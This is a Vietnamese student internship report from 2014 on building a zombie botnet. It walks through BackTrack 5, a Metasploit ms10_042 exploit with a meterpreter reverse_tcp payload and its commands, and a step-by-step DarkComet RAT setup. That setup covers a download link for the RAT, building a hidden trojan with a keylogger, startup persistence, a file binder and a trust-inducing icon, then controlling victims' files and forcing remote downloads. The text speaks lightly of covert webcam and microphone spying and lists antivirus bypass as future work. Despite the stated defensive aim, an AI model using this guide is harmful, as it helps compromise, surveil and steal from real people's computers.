38
Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng GVHD: Võ Đỗ Thắng Sinh viên thục hiện: - Nguyễn Văn Luân TP. Hồ Chí Minh, tháng 8 năm 2014

Bao cao thuc tap zombie-botnet nguyen van luan

Embed Size (px)

DESCRIPTION

Bao cao thuc tap zombie-botnet nguyen van luan

Citation preview

Page 1: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng

GVHD: Võ Đỗ Thắng

Sinh viên thục hiện:

­ Nguyễn Văn Luân

TP. Hồ Chí Minh, tháng 8 năm 2014

Page 2: Bao cao thuc tap  zombie-botnet nguyen van luan

MỤC LỤC LƠI MƠ ĐÂU ........................................................................................................................... 2

1. Sự cần thiết cua đê tai...................................................................................................... 2

2. Muc tiêu nghiên cưu........................................................................................................ 2

3. Phương phap nghiên cưu.................................................................................................. 2

4. Kết câu đê tai ................................................................................................................. 2

LỜI CẢM ƠN.............................................................................................................................. 4

NHẬN XÉT CỦA GIÁO VIÊN .......................................................................................................... 5

PHÂN 1 : GIỚI THIỆU VỀ BACKTRACK 5 ............................................................................... 6

1. Giới thiệu ...................................................................................................................... 6

2. Muc đích ....................................................................................................................... 6

3. Cai đặt ........................................................................................................................... 7

PHÂN 2: TRIỂN KHAI TRONG MÔI TRƯƠNG LAN ............................................................... 14

1. Mô phỏng mạng LAN ................................................................................................... 14

.......................................................................................................................................... 14

2. Thử nghiệm xâm nhập bằng Metasploit ........................................................................... 14

PHÂN 3: XÂY DỰNG BOTNET BẰNG DARKCOMET ............................................................ 18

1. Giới thiệu DarkComet ................................................................................................... 18

2. Cai đặt DarkComet ....................................................................................................... 18

HƯỚNG PHÁT TRIỂN............................................................................................................ 35

KẾT LUẬN ............................................................................................................................ 36

TÀI LIỆU THAM KHẢO ......................................................................................................... 37

Page 3: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 2

LƠI MƠ ĐÂU 1. Sự cần thiết cua đê tai Trong cac kiểu tân công hệ thống trên internet, tân công DDoS (Distributed Denial of

Service) la cach tân công đơn giản, hiệu quả va khó phòng chống bậc nhât. DDoS la

cach tân công dựa vao việc gửi số lượng lớn yêu cầu (request) đến hệ thống nhằm

chiếm dung tai nguyên, lam cho hệ thống qua tải, không thể tiếp nhận va phuc vu cac

yêu cầu từ người dùng thực sự. Ví du điển hình la vao thang 7 năm 2013, hang loạt cac

trang bao điện tử cua Việt Nam như Vietnamnet, Tuổi Trẻ Online, Dân Trí, Thanh niên

Online bị tân công dẫn đến không thể truy cập được trong nhiêu tuần lễ liên tiếp. Theo

thống kê từ Abort Network, đầu năm 2014 có hơn 100 vu tân công DDoS trên

100Gbps, 5733 vu tân công đạt 20Gbps gâp hơn hai lần năm 2013.

Để có thể tạo được số lượng yêu cầu đu lớn để đanh sập hệ thống muc tiêu, cac hacker

thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến hang triệu may.

Vì vậy, nghiên cưu vê cach xây dựng mạng lưới zombie, botnet sẽ giúp chúng ta hiểu

hơn vê cach hoạt động, từ đó xây dựng cac biện phap phòng ngừa sự phat triển cua hệ

thống zombie, botnet.

2. Muc tiêu nghiên cưu Đề tài nghiên cứu trên hai môi trường:

Giai đoạn 1: Trong môi trường mạng LAN, tìm ra được cac lỗ hổng bảo mật trên cac

may trong mạng, thử xâm nhập trên cac may.

Giai đoạn 2: Trong môi trường Internet, dùng DarkComet để thử tạo, phat tan va điểu

khiển mạng lưới botnet thông qua mạng Internet.

3. Phương phap nghiên cưu Giai đoạn 1: Sử dung ảo hóa VMware để mô phỏng môi trường mạng LAN. Cai đặt

Backtrack trên một may ảo VMware. Sau đó thực hiện thâm nhập từ may Backtrack tới

một muc tiêu.

Giai đoạn 2: Cai đặt va tạo bot trên VPS (Virtual Private Server) va phat tan trên

mạng. Sau đó thực hiện xâm nhập, kiểm soat từ xa thông qua địa chỉ IP public cua

VPS.

4. Kết câu đê tai Phần 1: Giới thiệu vê Backtrack 5

Phần 2: Triển khai trong môi trường LAN

Page 4: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 3

Phần 3: Triển khai xây dựng botnet bằng DarkComet

Kêt luân

Qua thời gian học tập và nghiên cưu trên ghế nha trường cùng với sự hỗ trợ tận tình cua

Thầy cô, bạn bè va người thân đã giúp em thu thập được nhiêu kiến thưc quý bao. Đặc biệt

là quá trình thực tập tại Trung tâm ATHENA giúp chúng em có những trải nghiệm vô cùng

thú vị và bổ ích. Với mong muốn tìm hiểu vê mạng máy tính và góp phần xây dựng một

mạng máy tính thân thiện, thông minh cho mọi người sử dung.

Tuy đã có rât nhiêu cố gắng song không thể tránh những khuyết điểm, sai sót. Vì thế mong

được sự thông cảm và những ý kiến đóng góp quý bao từ Quý Thầy Cô, bạn bè, bạn đọc để

chúng em có thể ngày một hoàn thiện đê tai đã chọn một cách tốt hơn nữa. Xin chân thành

cảm ơn

Page 5: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 4

LỜI CẢM ƠN

Thực tập là quá trình tham gia học hỏi, so sánh, nghiên cứu và ứng dụng

những kiến thức đã học vào thực tế công việc ở các cơ quan quản lý hành chính nhà nước và các công

việc sau này. Với nhiều kiến thức còn bỡ ngỡ của một sinh viên năm cuối, chuyên ngành công nghệ

thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM, chúng em đã được tham gia trong suốt

quá trình thực tập tại trung tâm Athena.

Tại đây chúng em đã nhận được nhiều sự hỗ trợ và giúp đỡ của các bạn bè đồng nghiệp và đặc biệt là

sự tận tình, chu đáo của thầy Võ Đỗ Thắng, giám đốc Trung tâm đào tạo và quản trị mạng an ninh quốc

tế. Cùng với sự hỗ trợ từ phía nhà trường, xin gởi lời cảm ơn chân thành đến quý Thầy Cô khoa công

nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM đã tạo điều kiện tốt nhất để chúng

em hoàn thành khóa thực tập này.

Với sự nỗ lực của bản thân và sự hỗ trợ giúp đỡ, kiến thức ban đầu vẫn còn nhiều hạn chế, vì vậy

không tránh khỏi những thiếu sót trong quá trình hoàn thành báo cáo. Mong nhận được nhiều đóng

góp ý kiến của quý Thầy Cô cũng như nhiều bạn cùng chuyên môn để có thể nắm vững kiến thức hơn.

Sau cùng, chúng em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng

lời chúc sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao đẹp của mình_ truyền đạt kiến thức cho

thế hệ mai sau.

Page 6: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 5

XÁC NHẬN CỦA CƠ QUAN

THỦ TRƯỞNG

(ký tên, đóng dấu)

NHẬN XÉT CỦA GIÁO VIÊN

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

..................................................................................................................................................

…...., ngày….tháng….năm 2014

CÁN BỘ HƯỚNG DẪN

(ký tên)

Page 7: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 6

PHÂN 1 : GIỚI THIỆU VỀ BACKTRACK 5 1. Giới thiệu Backtrack la bản phân phối dựa trên GNU/LINUX Debian nhắm muc đích phap y kỹ

thuật số va sử dung thử nghiệm thâm nhập.Việc phân phối Backtrack có nguồn gốc từ

sự hợp nhât cua hai phân phối trước đây la cạnh tranh ma tập trung vao thử nghiệm

thâm nhập: WHAX va Auditor Security Collection.

2. Muc đích Backtrack 5 có cac công cu được sử dung cho qua trình thử nghiệm xâm nhập. Cac

công cu kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau :

1. Information gathering: loại nay có chưa một số công cu có thể được sử dung

để có được thông tin liên quan đến muc tiêu DNS,định tuyến, địa chỉ

email,trang web,may chu mail…Thông tin nay được thu thập từ cac thông

tin có sẵn trên internet,ma không cần chạm vao môi trường muc tiêu.

2. Network mapping: loại nay chưa một số công cu có thể được sử dung để có

kiểm tra cac host đang tôn tại,thông tin vê OS,ưng dung được sử dung bởi

muc tiêu,va cũng lam portscanning.

3. Vulnerability identification: Trong thể loại nay, chúng ta có thể tìm thây cac

công cu để quét cac lỗ hổng (tổng hợp) va trong cac thiết bị Cisco. Nó cũng

chưa cac công cu để thực hiện va phân tích Server Message Block (SMB)

và Simple Network Management Protocol (SNMP).

4. Web application analysis: loại nay chưa cac công cu có thể được sử dung

trong theo dõi, giam sat cac ưng dung web.

5. Radio network analysis: Để kiểm tra mạng không dây, bluetooth va nhận

dạng tần số vô tuyến (RFID).

6. Penetration: loại nay chưa cac công cu có thể được sử dung để khai thac cac

lỗ hổng tìm thây trong cac may tính muc tiêu.

7. Privilege escalation: Sau khi khai thac cac lỗ hổng va được truy cập vao cac

may tính muc tiêu, chúng ta có thể sử dung cac công cu trong loại nay để

nâng cao đặc quyên cua chúng ta cho cac đặc quyên cao nhât.

8. Maintaining access: Công cu trong loại nay sẽ có thể giúp chúng ta trong

việc duy trì quyên truy cập vao cac may tính muc tiêu. Chúng ta có thể cần

để có được những đặc quyên cao nhât trước khi cac chúng ta có thể cai đặt

công cu để duy trì quyên truy cập.

9. Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dung cac

công cu trong thể loại nay.

Page 8: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 7

10. Digital forensics: Trong loại nay, chúng ta có thể tìm thây một số công cu

có thể được sử dung để lam phân tích kỹ thuật như có được hình ảnh đĩa

cưng, câu trúc cac tập tin, va phân tích hình ảnh đĩa cưng. Để sử dung cac

công cu cung câp trong thể loại nay, chúng ta có thể chọn Start Backtrack

Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn

kết nội bộ đĩa cưng va cac tập tin trao đổi trong chế độ chỉ đọc để bảo tồn

tính toan vẹn.

11. Reverse engineering: Thể loại nay chưa cac công cu có thể được sử dung để

gỡ rối chương trình một hoặc thao rời một tập tin thực thi.

3. Cai đặt Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack-

linux.org/downloads/, có bản cho Vmware và file ISO.

1. Live DVD

Nếu chúng ta muốn sử dung Backtrack mà không cần cài nó vào ổ cưng,

chúng ta có thể ghi tập tin ảnh ISO vao đĩa DVD, va khởi động máy tính

cua chúng ta với DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế cua

việc sử dung Backtrack là một DVD Live là nó là rât dễ dàng để làm và

chúng ta không cần phải gây rối với câu hình máy hiện tại cua chúng ta.

Tuy nhiên, phương phap nay cũng có một số nhược điểm. Backtrack có thể

không làm việc với phần cưng, va thay đổi câu hình nao được thực hiện trên

phần cưng để làm việc sẽ không được lưu với đĩa DVD Live. Ngoai ra, nó

là chậm, vì máy tính cần phải tải cac chương trình từ đĩa DVD.

2. Install

Cai đặt trong máy thật

Chúng ta cần chuẩn bị một phân vùng để cai đặt Backtrack. Sau đó chạy

Backtrack Live DVD. Khi gặp màn hình login, ta sử dung username là root,

pass la toor. Sau đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ

họa cua Backtrack 5.

Để cai đặt Backtrack 5 đến đĩa cưng ta chọn tập tin có tên install.sh trên

desktop và tiến hanh cai đặt. Tuy nhiên, nếu không thể tìm thây tập tin,

chúng ta có thể sử dung ubiquity để cai đặt. Để sử dung ubiquity, ta mở

Terminal gõ ubiquity. Sau đó cửa sổ cai đặt sẽ hiển thị. Sau đó trả lời 1 số

Page 9: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 8

câu hỏi như thanh phố chúng ta đang sống, keyboard layout, phân vùng ổ

đĩa cai đặt,… Sau đó tiến hanh cai đặt.

Cai đặt trong máy ảo

Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và

sử dung đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng

được wireless trừ USB wireless.

Ta có thể có thể sử dung file VMWare được cung câp bởi BackTrack. Từ

đây chúng ta có BackTrack trên may ảo thật dễ dàng và nhanh chóng. Câu

hình trong file VMWare là memory 768MB, hardisk :30GB, Network:NAT.

Để sử dung được card mạng thật, ta phải chọn Netword là Briged

Dưới đây lam một số hình ảnh khi cài BackTrack trên máy ảo VMWare

Tạo một máy ảo mới va cho đia BackTrack vao

Page 10: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 9

Giao diện khởi động cua BackTrack

Gõ startx để vào chế độ đồ họa trong BackTrack

Page 11: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 10

Để cai đặt, click chọn vào file Install BackTrack trên màn hình Desktop

Page 12: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 11

Chọn ngôn ngữ, chọn Tiếp để tiếp tuc

Chọn múi giờ, chọn Tiếp để tiếp tuc

Page 13: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 12

Chọn ngôn ngữ bàn phím, chọn Forward để tiếp tuc

Chọn phân vùng để cài, chọn Tiếp để tiếp tuc

Page 14: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 13

Nhân Cai đặt để bắt đầu cài

Qua trình cai đã bắt đầu.

Sau khi hoàn tât, chúng ta khởi động lại

Page 15: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 14

PHÂN 2: TRIỂN KHAI TRONG MÔI TRƯƠNG LAN 1. Mô phỏng mạng LAN

Mô hình mạng LAN được mô phỏng:

Để chỉ định máy ảo sử dung Bridge ảo VMnet0, trong giao diện VMware, kích

chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn muc Network

Adapter, sau đó trong muc Network Connection, chọn tùy chọn Bridged

2. Thử nghiệm xâm nhập bằng Metasploit Trong Backtrack5r3, chúng ta sử dung công cu Metasploit để thực hiện xâm nhập.

Để khởi động giao diện Console cua Metasploit, trong Terminal, gõ lệnh

msfconsole.

Switch

PC1 PC2 PC3

Page 16: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 15

Để sử dung một module nao đó, chúng ta sử dung cú pháp:

use <Đường dẫn đến module>

VD: khai thác lỗi ms10_042

Sử dung lệnh search ms10_042 để tìm ra moudle cần dùng

Page 17: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 16

use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec-> Enter

Các thiết lập:

set PAYLOAD windows/meterpreter/reverse_tcp

set SRVHOST 192.168.1.101

Page 18: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 17

set LHOST 192.168.1.101

exploit

Sau khi exploit, Metasploit sẽ tạo một link chưa mã độc (http://192.168.1.101:80/),

chỉ cần nạn nhân click vao link thì mã độc sẽ được gửi sang máy nạn nhân và sau

đó có thể chiếm quyên máy.

Page 19: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 18

PHÂN 3: XÂY DỰNG BOTNET BẰNG DARKCOMET

1. Giới thiệu DarkComet

DarkComet la một công cu quản trị từ xa (Remote Administrator Tool) miễn phí rât nổi tiếng, Tuy nhiên mình thây Dark Comet la một soft đơn giản cực kì lợi hại va nguy hiểm, với cac tính năng như:

+ Remote Desktop Như TeamViewer nhưng không cần sự đồng ý.

+ Xem cac thư muc cua may victim, ăn cắp tai liệu từ may victim. + Có thể tạo, đọc va xóa cac thư muc trong may victim.

+ Xem lén Webcam cua victim. + Nghe trộm qua microphone cua victim. + Mở website bât kì ma không cần sự đồng ý cua victim.

+ Chat với victim (cai nay fê phết, victim còn đíu tắt được cơ) + Keylog có thể xem luôn hoặc vê email.

+ Xem regedit + Có thể sử dung chưc năng ctrl + alt + del, Task Manager + Download file va chạy bình thường hoặc la ẩn ( Send sang may victim thêm vai

con trojan nữa chẳng hạn) + Khởi động cùng win con trojan đó…

Dự án DarkComet RAT đã phat hanh bản chính thưc cuối cùng là DarkComet RAT

v5.4.1 Legacy vào ngày 1/10/2012.

2. Cai đặt DarkComet Bản darkcomet dùng trong bao cao được tải từ:

http://www.mediafire.com/download/37bd1c0acbd2p6c/darkcomet+5.3.1.rar.

Chạy DarkComet trên linux:

Tải bản DarkComet vê, giải nén vao thư muc darkcomet5.3.1RAT dùng lệnh: unzip

darkcomet5.3.1RAT.

Mở terminal, chuyển thư muc làm việc hiện hành vê darkcomet5.3.1RAT.

Dùng lệnh wine darkcomet để khởi động DarkComet: wine darkcomet

Page 20: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 19

Giao diện quản lí các bot cua DarkComet, chờ đợi các kết nối tới:

Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to

new port(+Listen)

Điên cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận

Giao diện thêm socket lắng nghe

Ta có thể thêm cổng lắng nghe khác nếu muốn.

Page 21: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 20

Tạo trojan:

Trojan có thể được tạo từ bât kì may windows nao. Cac bước tạo trojan:

- Download DarkComet v 531

- Sau đó giải nén file DarkComet531RAT.zip

- Vao thư muc giải nén, chạy file DarkComet.exe

- Ch úng ta c ó 2 t ùy ch ọn. ch ọn option c ua tro jan theo m ặc đ ịnh (DarkComet ->

Server module-> Minimalist) ho ặc t ùy ch ọn (DarkComet -> Server module->

Full Editor)

Giao diện tùy chọn:

Page 22: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 21

Các cài đặt:

+ Main settings

- Password

- server ID,

- profile name

- tùy chọn bypass tường lửa

+ Network Settings

- Cai đặt IP sẽ lắng nghe các bot và cổng lắng nghe cua server.

Page 23: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 22

Page 24: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 23

+ Module Startup

Tùy chọn bot có khởi động cùng Windows hay không.

Page 25: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 24

+ Install Message

Hiển thị hộp thoại thông báo và nội dung khi nạn nhân chạy chương

trình bot hay không

Page 26: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 25

+ Module Shield:

Các tùy chọn giúp bot ẩn

Page 27: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 26

+ Keylogger

Tùy chọn ghi log ban phím, địa chỉ tải log.

Page 28: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 27

+ File Binder

Tùy chọn đính kèm file khac.

Page 29: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 28

+ Choose Icon

Tùy chọn một icon để tạo sự tin tưởng cho nạn nhân.

Page 30: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 29

+ Stub Finalization

Tùy chọn định dạng xuât file trojan (.exe, .com, .bat, .pif, .scr), tùy chọn

cach nén file trojan va lưu cac cai đặt để sử dung lại.

Sau khi đã cai đặt xong các tùy chọn, chọn Build The Stub và chọn nơi lưu để tạo

trojan.

Page 31: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 30

Giao diện quản lí users:

Page 32: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 31

Giao diện điêu khiển user:

Demo điều khiển máy nạn nhân

Xem thông tin máy nạn nhân

Trong giao diện điêu khiển user, vao tab Comuter Information để xem thông tin máy nạn

nhân. Nếu thông tin chưa hiển thị, nhân Refresh để hiển thị.

Page 33: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 32

Quản lý file

Trong giao diện điêu khiển user, vào muc Files manager - > Explorer files

Ta có giao diện quản lý files trong máy nạn nhân

Page 34: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 33

Cột bên trai la cac thư muc trong máy chu (server), cột bên phải la cac thư muc trong máy

nạn nhân. DarkComet có toàn quyên với máy nạn nhân nên ta có thể duyệt thư muc, thêm,

sửa, xóa các thư muc hay file trong máy nạn nhân. Ví du duyệt thư muc C:\

Page 35: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 34

Xem danh sách các port đang mở trên máy nạn nhân

Trong giao diện quản lý user, vào Network Functions -> Active ports.

Trên bảng điêu khiển, ta thây được cac process nao đang dùng port nao, trạng thái port.

Đồng thời ta còn có thể tắt những process đang chạy bằng cách nhâp chuột phải vào

process muốn tắt và chọn Kill process ID.

Điêu khiển máy nạn nhân download và thực thi một file

Từ giao diện điêu khiển user, vào Network Funtions -> Url download.

Page 36: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 35

Chọn nơi lưu trữ file tại ô Destination Path

Chọn đường dẫn download tại ô Download from.

Tùy chọn file có thực thi ngay sau khi download thành công bằng cách tick vào ô Execute

the file after download.

Sau khi thiết lập xong các tùy chọn, nhân Add để thêm vao danh sach đợi lệnh, nhân

Launch Process để thực thi lệnh.

Ví du: download và mở một file html tại http://webdesignerbk10.tk/index.html, lưu file tại

Desktop. Kết quả: trên Desktop máy nạn nhân có file index.html và trình duyệt mặc định

cua máy nạn nhân mở file này lên.

HƯỚNG PHÁT TRIỂN Công nghệ thông tin la nganh đang phat triển rât mạnh ở Việt Nam. Theo số liệu từ “Sach

trắng Công nghệ thông tin – Truyên thông 2013”, cả nước có trên 1300 trang thông tin

điện tử, 420 trang mạng xã hội được câp phép. Đi cùng với sự phát triển này là số lượng

các máy chu (server) phuc vu các trang mạng, may tính để bàn (PC), máy tính xách tay

(laptop) cũng tăng lên rât nhanh. Nếu không có các biện pháp bảo mật nghiêm ngặt thì đây

la môi trường rât thuận lợi cho sự phát triển cua botnet, zombie.

Page 37: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 36

Để tiếp tuc phát triển va đap ưng yêu cầu thực tế, đê tài này cần nghiêng cưu mở rộng theo

cac hướng:

Cac phương phap bypass cac antivirus hiện tại

Các loại bot phổ biến và nguy hiểm khác

Các cách phát tán botnet

Các cách khai thác botnet

Cac phương phap hiệu quả để phòng chống trở thành zombie, botnet

KẾT LUẬN Từ khi ra đời đến nay, mạng internet luôn tiêm ẩn nguy cac nguy cơ bảo mật. Tìm hiểu vê

mạng lưới zombie, botnet rât có ích cho người dùng phổ thông, giúp hạn chế nguy cơ bị

biến thanh botnet. Đê tai nay cang có ít cho người quản trị hệ thống, giúp hiểu rõ cơ chế

hoạt động cua mạng lưới zombie, botnet, từ đó đê ra cac biện phap phòng ngừa thích hợp.

Page 38: Bao cao thuc tap  zombie-botnet nguyen van luan

Trung tâm đào tạo Quản trị và An ninh mạng Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 37

TÀI LIỆU THAM KHẢO 3. Trung tâm đao tạo Quản trị mạng & An ninh mạng Athena, “TÀI LIỆU

HƯỚNG DẪN VÀ SỬ DỤNG BACKTRACK 5 ĐỂ KHAI THÁC LỖ

HỔNG MẠNG TẠI TRUNG TÂM ATHENA”

4. Trung tâm đao tạo Quản trị mạng & An ninh mạng Athena, “Bảo mật mạng

– Bí quyết và giải pháp”

5. Diễn đan Athena, http://athena.edu.vn/forum/forum.php

6. http://www.arbornetworks.com/corporate/blog/5243-volumetric-with-a-

capital-v